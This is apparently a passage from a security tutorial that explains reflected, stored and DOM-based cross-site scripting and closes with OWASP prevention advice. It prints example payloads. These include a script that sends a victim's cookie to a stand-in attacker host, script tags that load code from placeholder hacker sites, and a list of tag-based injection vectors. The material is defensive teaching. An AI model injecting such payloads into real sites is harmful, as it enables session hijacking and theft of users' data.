XSS is said to be one of the most problematic security issues due to the lack of knowledge about it and its lack of prevention among the developer's community.
This is quite simple in some of its implementations, though, and that's why it is so dangerous. There are three known forms of XSS attacks: stored, reflected, and DOM based.
One of the official examples of these attacks (reflected) presents the following code:
"<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";That is, the pages build an input field based on a request. Also, an attacker can modify the page in this way:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
What happens? The inserted code reflects the requested information about a user to the attacker, or to say it as in the OWASP documentation:
"This causes the victim's SessionID is sent to the attacker's website, allowing the attacker to hijack the user's current session."
The stored version of XSS (there are many, though) is a typical type of attack related to any possible user input, such as a blog with user comments, and so on. The attacker's response is saved in the website's storage system, and that's why the name.
In this scenario, the first thing that an attacker will do is insert into the answer, a character that should be escaped to see whether, indeed, it is escaped (something like a <, for example). If the character shows up (it is not escaped), it means that the programmer doesn't check input in the comments.
Now comes the tricky part: instead of just a humble < sign, you can insert something like this:
<iframe src="http://hackersite.com" height="400" width=500/>
Since this is to be rendered on the page with the rest of the contents, whatever you write will be inserted and shown also. Of course, it would be more evil if instead of using just an iframe, you insert a script tag that loads some dangerous JavaScript:
"></a><script src="http://dangerous_site.com"></script><a href="
This will remain unnoticed to the users since the new anchor tag doesn't contain any text and is unseen. This script will now run when any user visits the Web, sending the attacker the information that the JavaScript code is prepared to send.
Some authors call this technique passive injection as opposed to active injection, in which without knowing the risks, the user participates in the hacking process.
Finally, the DOM-based version of XSS uses DOM tags to perform their actions. These attacks modify tags that are known to search and load external content: img, link, script, input, iframe, object, and even body, div, or table with the excuse of changing the background property.
Here are some examples of these attacks:
<!-- Different DOM Based attacks -->
<!-- External script -->
<scriptsrc=http://hackersite.com/xss.js></script>
<!-- <link> XSS -->
<linkrel="stylesheet"href="javascript:alert('XSS');">
<!-- <img> XSS -->
<imgsrc="javascript:alert('XSS');">
<!-- <input> XSS -->
<inputtype="image"src="javascript:alert('XSS');">
<!-- <object> XSS -->
<objecttype="text/x-scriptlet"data="http://hackersite.com/xss.html"/>Note that even innocent tags, such as div, table, or body, can be used for these purposes:
<!-- <div> XSS -->
<divstyle="background-image: url(javascript:alert('XSS'))"></div>
<!-- <div> XSS -->
<divstyle="width: expression(alert('XSS'));"></div>
<!-- <table> XSS -->
<tablebackground="javascript:alert('XSS')">
<!-- <td> XSS -->
<tr><tdbackground="javascript:alert('XSS')"></td></tr>
</table>
<!-- onload attribute -->
<bodyonload=alert("XSS")>
<!-- background attribute -->
<bodybackground="javascript:alert('XSS')">In general, the documentation states that:
Preventing XSS requires separation of untrusted data from active browser content.
Actually, to afford the problem, there are several suggestions:
- We should start by properly escaping all untrusted data based on the HTML context (as we've seen: body, attributes, any JavaScript or CSS, or even URLs) taken from the user. The XSS (Cross Site Scripting) Prevention Cheat Sheet (https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) documentation contains details on how these data escaping techniques can be applied.
- The whitelist input validation technique we saw in the previous points is also recommended, but it is not a complete defense because some applications require the admission of special characters. For this scenario, we should validate the length, characters, format, and business rules before accepting any entry.
- Other measures include auto-sanitization libraries and even the use of a Content Security Policy (CSP) to defend your entire site against XSS.
In .NET, some measures are taken by default, as we mentioned earlier. This includes the insertion of some JavaScript libraries by default, such as jQuery Validate and jQuery Validate Unobtrusive, in order to check the user's input prior to sending any data to the server.
As always, it is recommended that you consider the business value and also the business impact of the possibly affected areas of the application as well as the data that is processed.
Another resource to keep in mind would be the DOM based XSS Prevention Cheat Sheet (https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet) documentation.